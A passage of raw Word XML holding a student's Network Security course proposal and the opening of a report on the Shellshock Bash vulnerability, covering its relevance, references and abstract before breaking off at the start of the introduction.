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36E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="200" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="30"/>
          <w:u w:color="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="30"/>
          <w:u w:color="434343"/>
        </w:rPr>
        <w:t>Proposal for Report and Presentation Project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Zhenghong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dong, Network Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Title: Shellshock: </w:t>
      </w:r>
      <w:r w:rsidR="00C129DD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Devastating Injection Hole I</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n Linux Bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Relevance: Shellshock is the recently discovered Bash vulnerability that exists in most Linux, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00695D04">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00695D04">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Mac systems. This is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00695D04">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>high</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-impact vulnerability due to the large number of systems that employ Bash and the high-level privilege, including the potential for root access, that attackers can gain. The vulnerabi</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ity could be exploited to bypass any authentication mechanism installed in the system, completely dis</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bling the security mechanisms that are relied on for protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Major points: This report covers the background of the Shellshock bug and its devastating impact if not remediated, and gives a detailed description of principles behind the super bug and how it could be e</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ploited. The bug originates from the manner in which Bash distinguishes whether an environment variable is a function. Based on the explanations, test methods are provided to determine whether a machine is vulnerable to Shellshock. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">References:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>National Vulnerability Database</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability Summary for CVE-2014-6271.</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-6271.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>National Vulnerability Database.</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability Summary for CVE-2014-7169.</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-7169.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trend Micro Threat Research Lab ( 2014) Shellshock: A Technical Report                      </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="005337BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-shellshock.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D0091" w:rsidRDefault="006D0091">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D0091" w:rsidRDefault="006D0091">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D0091" w:rsidRDefault="006D0091">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D0091" w:rsidRDefault="006D0091">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="006D0091" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00562273">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Student: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00235523" w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Zhenghong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00235523" w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dong</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00562273">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Instructor: </w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stan</w:t>
      </w:r>
      <w:r w:rsidR="005C27AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ley</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00235523" w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00EF5C21">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Course: </w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Network Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> DATE \@ "MMMM d, y" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">December </w:t>
      </w:r>
      <w:r w:rsidR="00603671" w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, 2014</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00F636E9" w:rsidP="005337BF">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="005337BF" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellshock: The Devastating Injection Hole </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005337BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Abstract:</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shellshock is a recently reported bug family that exists in Bash, which is the default shell for most Unix and Linux systems. </w:t>
      </w:r>
      <w:r w:rsidR="00EE653C" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is considered extremely dangerous because of its extremely widespread existence, easiness of exploitation through network, high impact on system security. Huge numbers of attacks exploiting the Shellshock vulnerability were detected shortly after its publication of the vulnerabi</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ity. In this report, detailed description of the principles, affected software or services and exploitation e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">amples are discussed. At last, recommended solutions of fixation are also given. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="393"/>
        </w:tabs>
        <w:ind w:left="393" w:hanging="393"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Shellshock, originally named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bashdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> by its discloser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>St</w:t>
      </w:r>
